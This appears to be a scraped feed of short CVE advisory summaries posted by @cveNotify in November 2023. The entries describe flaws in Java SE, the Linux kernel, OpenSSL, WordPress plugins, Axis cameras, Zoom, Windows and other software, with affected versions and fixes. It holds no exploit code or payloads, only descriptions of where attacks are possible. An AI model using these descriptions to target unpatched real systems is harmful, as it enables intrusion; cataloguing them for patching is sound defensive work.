🚨 CVE-2018-2678Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-11-21 18:25:40 |
🚨 CVE-2018-2637Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JMX). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, JRockit accessible data as well as unauthorized access to critical data or complete access to all Java SE, Java SE Embedded, JRockit accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).🎖@cveNotify |
|
| 2023-11-21 17:55:41 |
🚨 CVE-2023-32279Improper access control in user mode driver for some Intel(R) Connectivity Performance Suite before version 2.1123.214.2 may allow unauthenticated user to potentially enable information disclosure via network access.🎖@cveNotify |
|
| 2023-11-21 17:55:40 |
🚨 CVE-2023-28376Out-of-bounds read in the firmware for some Intel(R) E810 Ethernet Controllers and Adapters before version 1.7.1 may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2023-11-21 17:25:46 |
🚨 CVE-2023-5367A out-of-bounds write flaw was found in the xorg-x11-server. This issue occurs due to an incorrect calculation of a buffer offset when copying data stored in the heap in the XIChangeDeviceProperty function in Xi/xiproperty.c and in RRChangeOutputProperty function in randr/rrproperty.c, allowing for possible escalation of privileges or denial of service.🎖@cveNotify |
|
| 2023-11-21 17:25:45 |
🚨 CVE-2023-42753An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-11-21 17:25:41 |
🚨 CVE-2023-4004A use-after-free flaw was found in the Linux kernel's netfilter in the way a user triggers the nft_pipapo_remove function with the element, without a NFT_SET_EXT_KEY_END. This issue could allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-11-21 17:25:40 |
🚨 CVE-2021-38111The DEF CON 27 badge allows remote attackers to exploit a buffer overflow by sending an oversized packet via the NFMI (Near Field Magnetic Induction) protocol.🎖@cveNotify |
|
| 2023-11-21 16:55:42 |
🚨 CVE-2023-5678Issue summary: Generating excessively long X9.42 DH keys or checkingexcessively long X9.42 DH keys or parameters may be very slow.Impact summary: Applications that use the functions DH_generate_key() togenerate an X9.42 DH key may experience long delays. Likewise, applicationsthat use DH_check_pub_key(), DH_check_pub_key_ex() or EVP_PKEY_public_check()to check an X9.42 DH key or X9.42 DH parameters may experience long delays.Where the key or parameters that are being checked have been obtained froman untrusted source this may lead to a Denial of Service.While DH_check() performs all the necessary checks (as of CVE-2023-3817),DH_check_pub_key() doesn't make any of these checks, and is thereforevulnerable for excessively large P and Q parameters.Likewise, while DH_generate_key() performs a check for an excessively largeP, it doesn't check for an excessively large Q.An application that calls DH_generate_key() or DH_check_pub_key() andsupplies a key or parameters obtained from an untrusted source could bevulnerable to a Denial of Service attack.DH_generate_key() and DH_check_pub_key() are also called by a number ofother OpenSSL functions. An application calling any of those otherfunctions may similarly be affected. The other functions affected by thisare DH_check_pub_key_ex(), EVP_PKEY_public_check(), and EVP_PKEY_generate().Also vulnerable are the OpenSSL pkey command line application when using the"-pubcheck" option, as well as the OpenSSL genpkey command line application.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.🎖@cveNotify |
|
| 2023-11-21 16:55:41 |
🚨 CVE-2023-46316In buc Traceroute 2.0.12 through 2.1.2 before 2.1.3, the wrapper scripts do not properly parse command lines.🎖@cveNotify |
|
| 2023-11-21 16:55:40 |
🚨 CVE-2021-45450In Mbed TLS before 2.28.0 and 3.x before 3.1.0, psa_cipher_generate_iv and psa_cipher_encrypt allow policy bypass or oracle-based decryption when the output buffer is at memory locations accessible to an untrusted application.🎖@cveNotify |
|
| 2023-11-21 15:25:40 |
🚨 CVE-2023-48124Cross Site Scripting in SUP Online Shopping v.1.0 allows a remote attacker to execute arbitrary code via the Name, Email and Address parameters in the Register New Account component.🎖@cveNotify |
|
| 2023-11-21 14:55:40 |
🚨 CVE-2023-35887Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache MINA.In SFTP servers implemented using Apache MINA SSHD that use a RootedFileSystem, logged users may be able to discover "exists/does not exist" information about items outside the rooted tree via paths including parent navigation ("..") beyond the root, or involving symlinks.This issue affects Apache MINA: from 1.0 before 2.10. Users are recommended to upgrade to 2.10🎖@cveNotify |
|
| 2023-11-21 14:25:58 |
🚨 CVE-2023-28802An Improper Validation of Integrity Check Value in Zscaler Client Connector on Windows allows an authenticated user to disable ZIA/ZPA by interrupting the service restart from Zscaler Diagnostics. This issue affects Client Connector: before 4.2.0.149.🎖@cveNotify |
|
| 2023-11-21 14:25:52 |
🚨 CVE-2023-5599A stored Cross-site Scripting (XSS) vulnerability affecting 3DDashboard in 3DSwymer from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2023x allows an attacker to execute arbitrary script code.🎖@cveNotify |
|
| 2023-11-21 14:25:51 |
🚨 CVE-2023-5553During internal Axis Security Development Model (ASDM) threat-modelling, a flaw was found in the protection for device tampering (commonly known as Secure Boot) in AXIS OS making it vulnerable to a sophisticated attack to bypass this protection. To Axis' knowledge, there are no known exploits of the vulnerability at this time. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2023-11-21 14:25:50 |
🚨 CVE-2023-4424An malicious BLE device can cause buffer overflow by sending malformed advertising packet BLE device using Zephyr OS, leading to DoS or potential RCE on the victim BLE device.🎖@cveNotify |
|
| 2023-11-21 14:25:47 |
🚨 CVE-2023-4149A vulnerability in the web-based management allows an unauthenticated remote attacker to inject arbitrary system commands and gain full system control. Those commands are executed with root privileges. The vulnerability is located in the user request handling of the web-based management.🎖@cveNotify |
|
| 2023-11-21 14:25:46 |
🚨 CVE-2023-21418Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX API irissetup.cgi was vulnerable to path traversal attacks that allows for file deletion. This flaw can only be exploited after authenticating with an operator- or administrator-privileged service account. The impact of exploiting this vulnerability is lower with operator service accounts and limited to non-system files compared to administrator-privileges. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2023-11-21 14:25:45 |
🚨 CVE-2023-21416Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX API dynamicoverlay.cgi was vulnerable to a Denial-of-Service attack allowing for an attacker to block access to the overlay configuration page in the web interface of the Axis device. This flaw can only be exploited after authenticating with an operator- or administrator-privileged service account however the impact is equal. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2023-11-21 14:25:41 |
🚨 CVE-2023-43590Link following in Zoom Rooms for macOS before version 5.16.0 may allow an authenticated user to conduct an escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-21 14:25:40 |
🚨 CVE-2023-42813Kyverno is a policy engine designed for Kubernetes. A security vulnerability was found in Kyverno where an attacker could cause denial of service of Kyverno. The vulnerable component in Kyvernos Notary verifier. An attacker would need control over the registry from which Kyverno would fetch attestations. With such a position, the attacker could return a malicious response to Kyverno, when Kyverno would send a request to the registry. The malicious response would cause denial of service of Kyverno, such that other users' admission requests would be blocked from being processed. This is a vulnerability in a new component released in v1.11.0. The only users affected by this are those that have been building Kyverno from source at the main branch which is not encouraged. Users consuming official Kyverno releases are not affected. There are no known cases of this vulnerability being exploited in the wild.🎖@cveNotify |
|
| 2023-11-21 13:55:41 |
🚨 CVE-2023-42815Kyverno is a policy engine designed for Kubernetes. A security vulnerability was found in Kyverno where an attacker could cause denial of service of Kyverno. The vulnerability was in Kyvernos Notary verifier. An attacker would need control over the registry from which Kyverno would fetch signatures. With such a position, the attacker could return a malicious response to Kyverno, when Kyverno would send a request to the registry. The malicious response would cause denial of service of Kyverno, such that other users' admission requests would be blocked from being processed. This is a vulnerability in a new component released in v1.11.0. The only users affected by this are those that have been building Kyverno from source at the main branch which is not encouraged. Users consuming official Kyverno releases are not affected. There are no known cases of this vulnerability being exploited in the wild.🎖@cveNotify |
|
| 2023-11-21 13:55:40 |
🚨 CVE-2023-42813Kyverno is a policy engine designed for Kubernetes. A security vulnerability was found in Kyverno where an attacker could cause denial of service of Kyverno. The vulnerable component in Kyvernos Notary verifier. An attacker would need control over the registry from which Kyverno would fetch attestations. With such a position, the attacker could return a malicious response to Kyverno, when Kyverno would send a request to the registry. The malicious response would cause denial of service of Kyverno, such that other users' admission requests would be blocked from being processed. This is a vulnerability in a new component released in v1.11.0. The only users affected by this are those that have been building Kyverno from source at the main branch which is not encouraged. Users consuming official Kyverno releases are not affected. There are no known cases of this vulnerability being exploited in the wild.🎖@cveNotify |
|
| 2023-11-21 13:25:40 |
🚨 CVE-2023-6235An uncontrolled search path element vulnerability has been found in the Duet Display product, affecting version 2.5.9.1. An attacker could place an arbitrary libusk.dll file in the C:\Users\user\AppData\Local\Microsoft\WindowsApps\ directory, which could lead to the execution and persistence of arbitrary code.🎖@cveNotify |
|
| 2023-11-21 11:25:41 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation in case that the attacker already has local privileges.🎖@cveNotify |
|
| 2023-11-21 11:25:40 |
🚨 CVE-2023-3812An out-of-bounds memory access flaw was found in the Linux kernel’s TUN/TAP device driver functionality in how a user generates a malicious (too big) networking packet when napi frags is enabled. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-11-21 10:25:40 |
🚨 CVE-2023-5598Stored Cross-site Scripting (XSS) vulnerabilities affecting 3DSwym in 3DSwymer from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2023x allow an attacker to execute arbitrary script code.🎖@cveNotify |
|
| 2023-11-21 09:25:40 |
🚨 CVE-2023-4799The Magic Embeds WordPress plugin before 3.1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-11-21 07:25:46 |
🚨 CVE-2023-4149A vulnerability in the web-based management allows an unauthenticated remote attacker to inject arbitrary system commands and gain full system control. Those commands are executed with root privileges. The vulnerability is located in the user request handling of the web-based management.🎖@cveNotify |
|
| 2023-11-21 07:25:45 |
🚨 CVE-2023-46935eyoucms v1.6.4 is vulnerable Cross Site Scripting (XSS), which can lead to stealing sensitive information of logged-in users.🎖@cveNotify |
|
| 2023-11-21 07:25:41 |
🚨 CVE-2023-21417Sandro Poppi, member of the AXIS OS Bug Bounty Program,has found that the VAPIX API manageoverlayimage.cgi was vulnerable to path traversal attacks that allows for file/folder deletion. This flaw can only be exploited after authenticating with an operator- or administrator- privileged service account. The impact of exploiting this vulnerability is lower with operator service accounts and limited to non-system files compared to administrator-privileges. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2023-11-21 07:25:40 |
🚨 CVE-2020-27792A heap-based buffer overwrite vulnerability was found in GhostScript's lp8000_print_page() function in the gdevlp8k.c file. This flaw allows an attacker to trick a user into opening a crafted PDF file, triggering the heap buffer overflow that could lead to memory corruption or a denial of service.🎖@cveNotify |
|
| 2023-11-21 06:25:40 |
🚨 CVE-2023-45886The BGP daemon (bgpd) in IP Infusion ZebOS through 7.10.6 allow remote attackers to cause a denial of service by sending crafted BGP update messages containing a malformed attribute.🎖@cveNotify |
|
| 2023-11-21 03:25:41 |
🚨 CVE-2023-47126TYPO3 is an open source PHP based web content management system released under the GNU GPL. In affected versions the login screen of the standalone install tool discloses the full path of the transient data directory (e.g. /var/www/html/var/transient/). This applies to composer-based scenarios only - “classic” non-composer installations are not affected. This issue has been addressed in version 12.4.8. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-21 03:25:40 |
🚨 CVE-2023-23367An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2376 build 20230421 and laterQuTS hero h5.0.1.2376 build 20230421 and laterQuTScloud c5.1.0.2498 and later🎖@cveNotify |
|
| 2023-11-21 02:55:46 |
🚨 CVE-2023-5381The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.12.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-11-21 02:55:45 |
🚨 CVE-2023-4723The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.12.7 via the ajax_eae_post_data function. This can allow unauthenticated attackers to extract sensitive data including post/page ids and titles including those of with pending/draft/future/private status.🎖@cveNotify |
|
| 2023-11-21 02:55:41 |
🚨 CVE-2023-48088xxl-job-admin 2.4.0 is vulnerable to Cross Site Scripting (XSS) via /xxl-job-admin/joblog/logDetailPage.🎖@cveNotify |
|
| 2023-11-21 02:55:40 |
🚨 CVE-2023-43591Improper privilege management in Zoom Rooms for macOS before version 5.16.0 may allow an authenticated user to conduct an escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-21 02:25:46 |
🚨 CVE-2023-48204An issue in PublicCMS v.4.0.202302.e allows a remote attacker to obtain sensitive information via the appToken and Parameters parameter of the api/method/getHtml component.🎖@cveNotify |
|
| 2023-11-21 02:25:45 |
🚨 CVE-2023-5997Use after free in Garbage Collection in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-11-21 02:25:41 |
🚨 CVE-2023-32204Improper access control in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-21 02:25:40 |
🚨 CVE-2023-25652Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents (corresponding to the rejected hunk(s) from the given patch). A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid using `git apply` with `--reject` when applying patches from an untrusted source. Use `git apply --stat` to inspect a patch before applying; avoid applying one that create a conflict where a link corresponding to the `*.rej` file exists.🎖@cveNotify |
|
| 2023-11-21 01:25:53 |
🚨 CVE-2023-48200Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component.🎖@cveNotify |
|
| 2023-11-21 01:25:46 |
🚨 CVE-2023-47444An issue discovered in OpenCart 4.0.0.0 to 4.0.2.3 allows authenticated backend users having common/security write privilege can write arbitrary untrusted data inside config.php and admin/config.php, resulting in remote code execution on the underlying server.🎖@cveNotify |
|
| 2023-11-21 01:25:45 |
🚨 CVE-2023-47347Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes.🎖@cveNotify |
|
| 2023-11-21 01:25:41 |
🚨 CVE-2023-6112Use after free in Navigation in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-11-21 01:25:40 |
🚨 CVE-2023-39199Cryptographic issues with In-Meeting Chat for some Zoom clients may allow a privileged user to conduct an information disclosure via network access.🎖@cveNotify |
|
| 2023-11-21 00:55:41 |
🚨 CVE-2023-39206Buffer overflow in some Zoom clients may allow an unauthenticated user to conduct a denial of service via network access.🎖@cveNotify |
|
| 2023-11-21 00:55:40 |
🚨 CVE-2023-39204Buffer overflow in some Zoom clients may allow an unauthenticated user to conduct a denial of service via network access.🎖@cveNotify |
|
| 2023-11-21 00:25:40 |
🚨 CVE-2023-40151When user authentication is not enabled the shell can execute commands with the highest privileges. Red Lion SixTRAK and VersaTRAK Series RTUs with authenticated users enabled (UDR-A) any Sixnet UDR message will meet an authentication challenge over UDP/IP. When the same message comes over TCP/IP the RTU will simply accept the message with no authentication challenge.🎖@cveNotify |
|
| 2023-11-20 23:25:41 |
🚨 CVE-2023-48310TestingPlatform is a testing platform for Internet Security Standards. Prior to version 2.1.1, user input is not filtered correctly. Nmap options are accepted. In this particular case, the option to create log files is accepted in addition to a host name (and even without). A log file is created at the location specified. These files are created as root. If the file exists, the existing file is being rendered useless. This can result in denial of service. Version 2.1.1 contains a patch for this issue.🎖@cveNotify |
|
| 2023-11-20 23:25:40 |
🚨 CVE-2023-39999Exposure of Sensitive Information to an Unauthorized Actor in WordPress from 6.3 through 6.3.1, from 6.2 through 6.2.2, from 6.1 through 6.13, from 6.0 through 6.0.5, from 5.9 through 5.9.7, from 5.8 through 5.8.7, from 5.7 through 5.7.9, from 5.6 through 5.6.11, from 5.5 through 5.5.12, from 5.4 through 5.4.13, from 5.3 through 5.3.15, from 5.2 through 5.2.18, from 5.1 through 5.1.16, from 5.0 through 5.0.19, from 4.9 through 4.9.23, from 4.8 through 4.8.22, from 4.7 through 4.7.26, from 4.6 through 4.6.26, from 4.5 through 4.5.29, from 4.4 through 4.4.30, from 4.3 through 4.3.31, from 4.2 through 4.2.35, from 4.1 through 4.1.38.🎖@cveNotify |
|
| 2023-11-20 22:25:41 |
🚨 CVE-2023-48176An Insecure Permissions issue in WebsiteGuide v.0.2 allows a remote attacker to gain escalated privileges via crafted jwt (JSON web token).🎖@cveNotify |
|
| 2023-11-20 22:25:40 |
🚨 CVE-2020-13920Apache ActiveMQ uses LocateRegistry.createRegistry() to create the JMX RMI registry and binds the server to the "jmxrmi" entry. It is possible to connect to the registry without authentication and call the rebind method to rebind jmxrmi to something else. If an attacker creates another server to proxy the original, and bound that, he effectively becomes a man in the middle and is able to intercept the credentials when an user connects. Upgrade to Apache ActiveMQ 5.15.12.🎖@cveNotify |
|
| 2023-11-20 21:25:53 |
🚨 CVE-2023-33878Path transversal in some Intel(R) NUC P14E Laptop Element Audio Install Package software before version 156 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-20 21:25:47 |
🚨 CVE-2023-33874Uncontrolled search path in some Intel(R) NUC 12 Pro Kits & Mini PCs - NUC12WS Intel(R) HID Event Filter Driver installation software before version 2.2.2.1 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-20 21:25:46 |
🚨 CVE-2023-32658Unquoted search path in some Intel(R) NUC Kits NUC7i3DN, NUC7i5DN, NUC7i7DN HDMI firmware update tool software before version 1.79.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-20 21:25:45 |
🚨 CVE-2023-32655Path transversal in some Intel(R) NUC Kits & Mini PCs - NUC8i7HVK & NUC8HNK USB Type C power delivery controller installatio software before version 1.0.10.3 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-20 21:25:41 |
🚨 CVE-2023-28737Improper initialization in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-20 21:25:40 |
🚨 CVE-2023-36719Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-11-20 20:55:53 |
🚨 CVE-2023-25949Uncontrolled resource consumption in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-11-20 20:55:46 |
🚨 CVE-2022-40681A incorrect authorization in Fortinet FortiClient (Windows) 7.0.0 - 7.0.7, 6.4.0 - 6.4.9, 6.2.0 - 6.2.9 and 6.0.0 - 6.0.10 allows an attacker to cause denial of service via sending a crafted request to a specific named pipe.🎖@cveNotify |
|
| 2023-11-20 20:55:45 |
🚨 CVE-2022-36396Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools before version iDmiEdit-Linux-5.27.06.0017 may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-20 20:55:41 |
🚨 CVE-2022-33945Improper input validation in some Intel(R) Server board and Intel(R) Server System BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-20 20:55:40 |
🚨 CVE-2022-29262Improper buffer restrictions in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-11-20 20:25:53 |
🚨 CVE-2023-36407Windows Hyper-V Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-11-20 20:25:47 |
🚨 CVE-2023-36406Windows Hyper-V Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-11-20 20:25:46 |
🚨 CVE-2023-36403Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-11-20 20:25:45 |
🚨 CVE-2023-36398Windows NTFS Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-11-20 20:25:41 |
🚨 CVE-2023-36017Windows Scripting Engine Memory Corruption Vulnerability🎖@cveNotify |
|
| 2023-11-20 20:25:40 |
🚨 CVE-2023-41366Under certain condition SAP NetWeaver Application Server ABAP - versions KERNEL 722, KERNEL 7.53, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.91, KERNEL 7.92, KERNEL 7.93, KERNEL 7.94, KERNEL64UC 7.22, KERNEL64UC 7.22EXT, KERNEL64UC 7.53, KERNEL64NUC 7.22, KERNEL64NUC 7.22EXT, allows an unauthenticated attacker to access the unintended data due to the lack of restrictions applied which may lead to low impact in confidentiality and no impact on the integrity and availability of the application.🎖@cveNotify |
|
| 2023-11-20 19:55:53 |
🚨 CVE-2023-36033Windows DWM Core Library Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-11-20 19:55:47 |
🚨 CVE-2023-36031Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2023-11-20 19:55:46 |
🚨 CVE-2023-47346Buffer Overflow vulnerability in free5gc 3.3.0, UPF 1.2.0, and SMF 1.2.0 allows attackers to cause a denial of service via crafted PFCP messages.🎖@cveNotify |
|
| 2023-11-20 19:55:45 |
🚨 CVE-2023-47625PX4 autopilot is a flight control solution for drones. In affected versions a global buffer overflow vulnerability exists in the CrsfParser_TryParseCrsfPacket function in /src/drivers/rc/crsf_rc/CrsfParser.cpp:298 due to the invalid size check. A malicious user may create an RC packet remotely and that packet goes into the device where the _rcs_buf reads. The global buffer overflow vulnerability will be triggered and the drone can behave unexpectedly. This issue has been addressed in version 1.14.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-20 19:55:41 |
🚨 CVE-2023-42781Apache Airflow, versions before 2.7.3, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. This is a different issue than CVE-2023-42663 but leading to similar outcome.Users of Apache Airflow are advised to upgrade to version 2.7.3 or newer to mitigate the risk associated with this vulnerability.🎖@cveNotify |
|
| 2023-11-20 19:55:40 |
🚨 CVE-2023-47108OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. Prior to version 0.46.0, the grpc Unary Server Interceptor out of the box adds labels `net.peer.sock.addr` and `net.peer.sock.port` that have unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent. An attacker can easily flood the peer address and port for requests. Version 0.46.0 contains a fix for this issue. As a workaround to stop being affected, a view removing the attributes can be used. The other possibility is to disable grpc metrics instrumentation by passing `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`.🎖@cveNotify |
|
| 2023-11-20 19:25:48 |
🚨 CVE-2023-44330Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-11-20 19:25:41 |
🚨 CVE-2023-36043Open Management Infrastructure Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-11-20 19:25:40 |
🚨 CVE-2023-47801An issue was discovered in Click Studios Passwordstate before 9811. Existing users (Security Administrators) could use the System Wide API Key to read or delete private password records when specifically used with the PasswordHistory API endpoint. It is also possible to use the Copy/Move Password Record API Key to Copy/Move private password records.🎖@cveNotify |
|
| 2023-11-20 18:55:46 |
🚨 CVE-2023-47446Pre-School Enrollment version 1.0 is vulnerable to Cross Site Scripting (XSS) on the profile.php page via fullname parameter.🎖@cveNotify |
|
| 2023-11-20 18:55:41 |
🚨 CVE-2023-41597EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t.🎖@cveNotify |
|
| 2023-11-20 18:55:40 |
🚨 CVE-2023-47629DataHub is an open-source metadata platform. In affected versions sign-up through an invite link does not properly restrict users from signing up as privileged accounts. If a user is given an email sign-up link they can potentially create an admin account given certain preconditions. If the default datahub user has been removed, then the user can sign up for an account that leverages the default policies giving admin privileges to the datahub user. All DataHub instances prior to the patch that have removed the datahub user, but not the default policies applying to that user are affected. Users are advised to update to version 0.12.1 which addresses the issue. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-20 18:25:53 |
🚨 CVE-2023-36394Windows Search Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-11-20 18:25:47 |
🚨 CVE-2023-36393Windows User Interface Application Core Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-11-20 18:25:46 |
🚨 CVE-2023-36050Microsoft Exchange Server Spoofing Vulnerability🎖@cveNotify |
|
| 2023-11-20 18:25:45 |
🚨 CVE-2023-36047Windows Authentication Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-11-20 18:25:41 |
🚨 CVE-2023-36045Microsoft Office Graphics Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-11-20 18:25:40 |
🚨 CVE-2023-26205An improper access control vulnerability [CWE-284] in FortiADC automation feature 7.1.0 through 7.1.2, 7.0 all versions, 6.2 all versions, 6.1 all versions may allow an authenticated low-privileged attacker to escalate their privileges to super_admin via a specific crafted configuration of fabric automation CLI script.🎖@cveNotify |
|
| 2023-11-20 17:55:47 |
🚨 CVE-2023-36028Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-11-20 17:55:46 |
🚨 CVE-2023-47373The leakage of channel access token in DRAGON FAMILY Line 13.6.1 allows remote attackers to send malicious notifications to victims.🎖@cveNotify |
|
| 2023-11-20 17:55:45 |
🚨 CVE-2023-47372The leakage of channel access token in UPDATESALON C-LOUNGE Line 13.6.1 allows remote attackers to send malicious notifications to victims.🎖@cveNotify |
|
| 2023-11-20 17:55:41 |
🚨 CVE-2023-47368The leakage of channel access token in taketorinoyu Line 13.6.1 allows remote attackers to send malicious notifications to victims.🎖@cveNotify |
|
| 2023-11-20 17:55:40 |
🚨 CVE-2023-47367The leakage of channel access token in platinum clinic Line 13.6.1 allows remote attackers to send malicious notifications to victims.🎖@cveNotify |
|
| 2023-11-20 17:25:40 |
🚨 CVE-2023-47262In Abbott ID NOW before 7.1, settings can be modified via physical access to an internal serial port.🎖@cveNotify |
|
| 2023-11-20 16:55:40 |
🚨 CVE-2023-45684Northern.tech CFEngine Enterprise before 3.21.3 allows SQL Injection. The fixed versions are 3.18.6 and 3.21.3. The earliest affected version is 3.6.0. The issue is in the Mission Portal login page in the CFEngine hub.🎖@cveNotify |
|
| 2023-11-20 16:25:42 |
🚨 CVE-2023-36013PowerShell Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-11-20 16:25:41 |
